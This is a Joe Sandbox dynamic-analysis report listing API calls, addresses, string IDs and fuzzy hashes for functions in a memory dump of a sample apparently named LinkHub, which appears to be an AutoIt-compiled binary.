                                                                    • Instruction Fuzzy Hash: B8312875904308BFDB109F54DC85B6976AAAB45312F12401BFB15D63A4D774DE808B60
                                                                    Function 00CA2FF3 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _free.LIBCMT ref: 00CA3007
                                                                      • Part of subcall function 00CA2D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00CADB51,?,00000000,?,00000000,?,00CADB78,?,00000007,?,?,00CADF75,?), ref: 00CA2D4E
                                                                      • Part of subcall function 00CA2D38: GetLastError.KERNEL32(?,?,00CADB51,?,00000000,?,00000000,?,00CADB78,?,00000007,?,?,00CADF75,?,?), ref: 00CA2D60
                                                                    • _free.LIBCMT ref: 00CA3013
                                                                    • _free.LIBCMT ref: 00CA301E
                                                                    • _free.LIBCMT ref: 00CA3029
                                                                    • _free.LIBCMT ref: 00CA3034
                                                                    • _free.LIBCMT ref: 00CA303F
                                                                    • _free.LIBCMT ref: 00CA304A
                                                                    • _free.LIBCMT ref: 00CA3055
                                                                    • _free.LIBCMT ref: 00CA3060
                                                                    • _free.LIBCMT ref: 00CA306E
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 776569668-0
                                                                    • Opcode ID: d94dc37f5827bb5ba527e92ab2e2413e365dc7c1e6caf29b00db5e630335aae9
                                                                    • Instruction ID: 8e0bd272e07c662805acabb505ebbb3fd356e4e6e0c68171b4b089b1f08a5168
                                                                    • Opcode Fuzzy Hash: d94dc37f5827bb5ba527e92ab2e2413e365dc7c1e6caf29b00db5e630335aae9
                                                                    • Instruction Fuzzy Hash: B311897A500119BFCB01EF98C842DDD3B65EF06354B9145A5F908AF222DB31DE51EB50
                                                                    Function 00CE8835 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 230COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00CE89F2
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00CE8A06
                                                                    • GetFileAttributesW.KERNEL32(?), ref: 00CE8A30
                                                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 00CE8A4A
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00CE8A5C
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00CE8AA5
                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00CE8AF5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentDirectory$AttributesFile
                                                                    • String ID: *.*
                                                                    • API String ID: 769691225-438819550
                                                                    • Opcode ID: ee474edc590153b6da0d0f3f46d9fd2aea658d6d5ddff47dc13b9b5b00c99712
                                                                    • Instruction ID: 73c28f7d17dcda6358a6ba8aba0f2b3031e20da76f284cd8c14d2d0f373939b1
                                                                    • Opcode Fuzzy Hash: ee474edc590153b6da0d0f3f46d9fd2aea658d6d5ddff47dc13b9b5b00c99712
                                                                    • Instruction Fuzzy Hash: AE81BF729043849FCB24EF56C444ABAB3E8BF84310F58482AF99DD7251DF34DA499B92
                                                                    Function 00C77447 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetWindowLongW.USER32(?,000000EB), ref: 00C774D7
                                                                      • Part of subcall function 00C77567: GetClientRect.USER32(?,?), ref: 00C7758D
                                                                      • Part of subcall function 00C77567: GetWindowRect.USER32(?,?), ref: 00C775CE
                                                                      • Part of subcall function 00C77567: ScreenToClient.USER32(?,?), ref: 00C775F6
                                                                    • GetDC.USER32 ref: 00CB6083
                                                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00CB6096
                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00CB60A4
                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00CB60B9
                                                                    • ReleaseDC.USER32(?,00000000), ref: 00CB60C1
                                                                    • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00CB6152
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                    • String ID: U
                                                                    • API String ID: 4009187628-3372436214
                                                                    • Opcode ID: a380b7988c3abc7ce8970872ba5798983385a0fbf17f4b5e873ccea791a934d2
                                                                    • Instruction ID: b6385b116f0e99b4e5c475db774604b2e5edb84730163fc130dbca7e02cbacd3
                                                                    • Opcode Fuzzy Hash: a380b7988c3abc7ce8970872ba5798983385a0fbf17f4b5e873ccea791a934d2
                                                                    • Instruction Fuzzy Hash: 6971B231504209DFCF259F68DC84AFE7BB5FF49310F14826AED699A2A6C7358940DF60
                                                                    Function 00D0955E Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00C7249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00C724B0
                                                                      • Part of subcall function 00C719CD: GetCursorPos.USER32(?), ref: 00C719E1
                                                                      • Part of subcall function 00C719CD: ScreenToClient.USER32(00000000,?), ref: 00C719FE
                                                                      • Part of subcall function 00C719CD: GetAsyncKeyState.USER32(00000001), ref: 00C71A23
                                                                      • Part of subcall function 00C719CD: GetAsyncKeyState.USER32(00000002), ref: 00C71A3D
                                                                    • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?), ref: 00D095C7
                                                                    • ImageList_EndDrag.COMCTL32 ref: 00D095CD
                                                                    • ReleaseCapture.USER32 ref: 00D095D3
                                                                    • SetWindowTextW.USER32(?,00000000), ref: 00D0966E
                                                                    • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00D09681
                                                                    • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?), ref: 00D0975B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                    • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                    • API String ID: 1924731296-2107944366
                                                                    • Opcode ID: b397d45d8b6fd813aa62234cf90eb8007c901d895bb77da8d65f12fa461b5008
                                                                    • Instruction ID: 079708eac7f41c17ee37fd76b883e159c0ebbf147a19785aeab276b63aaabaf9
                                                                    • Opcode Fuzzy Hash: b397d45d8b6fd813aa62234cf90eb8007c901d895bb77da8d65f12fa461b5008
                                                                    • Instruction Fuzzy Hash: B7517A75104304AFD704EF24CC5AFAA77E5FB88714F400A2DF99A972E2DB719908DB62
                                                                    Function 00CECC98 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00CECCB7
                                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00CECCDF
                                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00CECD0F
                                                                    • GetLastError.KERNEL32 ref: 00CECD67
                                                                    • SetEvent.KERNEL32(?), ref: 00CECD7B
                                                                    • InternetCloseHandle.WININET(00000000), ref: 00CECD86
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                    • String ID:
                                                                    • API String ID: 3113390036-3916222277
                                                                    • Opcode ID: ef4f3f02999ffa7d8fd976c47f78c4a3c048f836d53d557b114de3de4116cf87
                                                                    • Instruction ID: d6747373264586bf17ac7c454b38dc9fa033c7b0696531b9e0e5cc83fddfd378
                                                                    • Opcode Fuzzy Hash: ef4f3f02999ffa7d8fd976c47f78c4a3c048f836d53d557b114de3de4116cf87
                                                                    • Instruction Fuzzy Hash: 91317F71500788AFD721AFA68CC8AAB7BFDEB45740B10452AF45AD3200DB35DE059B71
                                                                    Function 00CDA215 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00CB55AE,?,?,Bad directive syntax error,00D0DCD0,00000000,00000010,?,?), ref: 00CDA236
                                                                    • LoadStringW.USER32(00000000,?,00CB55AE,?), ref: 00CDA23D
                                                                      • Part of subcall function 00C7B329: _wcslen.LIBCMT ref: 00C7B333
                                                                    • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00CDA301
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: HandleLoadMessageModuleString_wcslen
                                                                    • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                    • API String ID: 858772685-4153970271
                                                                    • Opcode ID: ce97d167c2d6a779df3933aa49dede153db77bc77357399290bbae2e688fba50
                                                                    • Instruction ID: 6f0b8801e6329d2c90e76ecd08e056569f2ef05affeab3db3e99ca7860bf16cb
                                                                    • Opcode Fuzzy Hash: ce97d167c2d6a779df3933aa49dede153db77bc77357399290bbae2e688fba50
                                                                    • Instruction Fuzzy Hash: 4B21657180061EEFCF11AFA0CC06EEE7B39BF18700F044456F519651A2EB719A58EB21
                                                                    Function 00CD29EC Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetParent.USER32 ref: 00CD29F8
                                                                    • GetClassNameW.USER32(00000000,?,00000100), ref: 00CD2A0D
                                                                    • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00CD2A9A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: ClassMessageNameParentSend
                                                                    • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                    • API String ID: 1290815626-3381328864
                                                                    • Opcode ID: 50d477d6d7161b7be3069d2b6d20fac8aa6a5b525702e236b51e77dc953bb17a
                                                                    • Instruction ID: 2e77333cc521821d8a6a59fcd28c52e6d6afe4b14f87848764154a8099e59bc7
                                                                    • Opcode Fuzzy Hash: 50d477d6d7161b7be3069d2b6d20fac8aa6a5b525702e236b51e77dc953bb17a
                                                                    • Instruction Fuzzy Hash: E411067B244307BDFA286621DC0ADA6779CCF25724B604013F60CE51D1FB62A9017924
                                                                    Function 00C77567 Relevance: 13.8, APIs: 9, Instructions: 291COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetClientRect.USER32(?,?), ref: 00C7758D
                                                                    • GetWindowRect.USER32(?,?), ref: 00C775CE
                                                                    • ScreenToClient.USER32(?,?), ref: 00C775F6
                                                                    • GetClientRect.USER32(?,?), ref: 00C7773A
                                                                    • GetWindowRect.USER32(?,?), ref: 00C7775B
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Rect$Client$Window$Screen
                                                                    • String ID:
                                                                    • API String ID: 1296646539-0
                                                                    • Opcode ID: bc6277efad86723cd5b87ec49273fd11f3db273863ce282228852b8a1369b2dd
                                                                    • Instruction ID: c9d1811f606af665d71f424fc95f4944810e86c3f0000143a685ed1c5f234b71
                                                                    • Opcode Fuzzy Hash: bc6277efad86723cd5b87ec49273fd11f3db273863ce282228852b8a1369b2dd
                                                                    • Instruction Fuzzy Hash: 01C16B3990464AEFDB10CFA9C540BEDB7F1FF18310F14851AE8A9E7250D734AA51DB60
                                                                    Function 00CAD210 Relevance: 13.7, APIs: 9, Instructions: 209COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                                    • String ID:
                                                                    • API String ID: 1282221369-0
                                                                    • Opcode ID: 5f3aecd92c875a004daacace096ae69c4f4c04468c808821689057a128f3ee8f
                                                                    • Instruction ID: d6f7d86baf717aa069b452e3c2c3130439ff95baf8d1c9b29d54085f0744fcc1
                                                                    • Opcode Fuzzy Hash: 5f3aecd92c875a004daacace096ae69c4f4c04468c808821689057a128f3ee8f
                                                                    • Instruction Fuzzy Hash: FF6137B5D01313AFDF21AFB8D8417AE7BA49F03328B04026DE957E7652D7319E40D661
                                                                    Function 00D05B72 Relevance: 13.7, APIs: 9, Instructions: 162windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00D05C24
                                                                    • ShowWindow.USER32(?,00000000), ref: 00D05C65
                                                                    • ShowWindow.USER32(?,00000005,?,00000000), ref: 00D05C6B
                                                                    • SetFocus.USER32(?,?,00000005,?,00000000), ref: 00D05C6F
                                                                      • Part of subcall function 00D079F2: DeleteObject.GDI32(00000000), ref: 00D07A1E
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00D05CAB
                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00D05CB8
                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00D05CEB
                                                                    • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00D05D25
                                                                    • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00D05D34
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                                    • String ID:
                                                                    • API String ID: 3210457359-0
                                                                    • Opcode ID: d4d7c6e8718bcfc5c9eab4a4cde7b268a3fe9d620863f468032eb7ff23436bb8
                                                                    • Instruction ID: 33c9d0ab5f3e457c1bc004193918d80005dbb691086c006fa3bff557e41beab9
                                                                    • Opcode Fuzzy Hash: d4d7c6e8718bcfc5c9eab4a4cde7b268a3fe9d620863f468032eb7ff23436bb8
                                                                    • Instruction Fuzzy Hash: 7051B034640B08BFEF249F55EC49B9A3B65EB04350F188112FE1D9A2E4C775A990DF71
                                                                    Function 00C713A6 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00CB28D1
                                                                    • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 00CB28EA
                                                                    • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00CB28FA
                                                                    • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00CB2912
                                                                    • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00CB2933
                                                                    • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00C711F5,00000000,00000000,00000000,000000FF,00000000), ref: 00CB2942
                                                                    • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00CB295F
                                                                    • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00C711F5,00000000,00000000,00000000,000000FF,00000000), ref: 00CB296E
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                    • String ID:
                                                                    • API String ID: 1268354404-0
                                                                    • Opcode ID: 5414c7d0e7a6c95283487d50c85344c63fbc49d4682e081b14106048140b9679
                                                                    • Instruction ID: 4d8c7bfeb5f4933de7718bb8f677ca2633cccdb5c38aa3d84417a4fd95f62629
                                                                    • Opcode Fuzzy Hash: 5414c7d0e7a6c95283487d50c85344c63fbc49d4682e081b14106048140b9679
                                                                    • Instruction Fuzzy Hash: 3C514B30A00305AFDB24DF69CC45BAA7BB6FF48760F148519F95AE72A0D770E950EB50
                                                                    Function 00CECB88 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00CECBC7
                                                                    • GetLastError.KERNEL32 ref: 00CECBDA
                                                                    • SetEvent.KERNEL32(?), ref: 00CECBEE
                                                                      • Part of subcall function 00CECC98: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00CECCB7
                                                                      • Part of subcall function 00CECC98: GetLastError.KERNEL32 ref: 00CECD67
                                                                      • Part of subcall function 00CECC98: SetEvent.KERNEL32(?), ref: 00CECD7B
                                                                      • Part of subcall function 00CECC98: InternetCloseHandle.WININET(00000000), ref: 00CECD86
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                    • String ID:
                                                                    • API String ID: 337547030-0
                                                                    • Opcode ID: 7fc88907922ac7e2b8e1107549b0ccd76902c81afe9e45975ffa3ba86559a531
                                                                    • Instruction ID: 3ab2bf22ee1f335aed7d51c61a8e21d94d6578293a0d2394bca3fc5c30400654
                                                                    • Opcode Fuzzy Hash: 7fc88907922ac7e2b8e1107549b0ccd76902c81afe9e45975ffa3ba86559a531
                                                                    • Instruction Fuzzy Hash: 11318B71100781AFCB218FB6CD84A6ABBB9FF44300B20452EF86EC6610C730E916AB60
                                                                    Function 00CD2EEF Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00CD4393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00CD43AD
                                                                      • Part of subcall function 00CD4393: GetCurrentThreadId.KERNEL32 ref: 00CD43B4
                                                                      • Part of subcall function 00CD4393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00CD2F00), ref: 00CD43BB
                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00CD2F0A
                                                                    • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00CD2F28
                                                                    • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00CD2F2C
                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00CD2F36
                                                                    • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00CD2F4E
                                                                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00CD2F52
                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00CD2F5C
                                                                    • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00CD2F70
                                                                    • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00CD2F74
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                    • String ID:
                                                                    • API String ID: 2014098862-0
                                                                    • Opcode ID: 2332391b8a96a0daa72c68ab5e54314e9716f0602a0ccc8a6152669a037fe965
                                                                    • Instruction ID: 002a93e283be63c50a1f48ca5c049ab605c92eb1794ab68f83fcd9c8468bcbf6
                                                                    • Opcode Fuzzy Hash: 2332391b8a96a0daa72c68ab5e54314e9716f0602a0ccc8a6152669a037fe965
                                                                    • Instruction Fuzzy Hash: 8F01B5306843147BFB106BA99C8AF597F6ADB5DB11F100016F318EE2E0C9F254449ABA
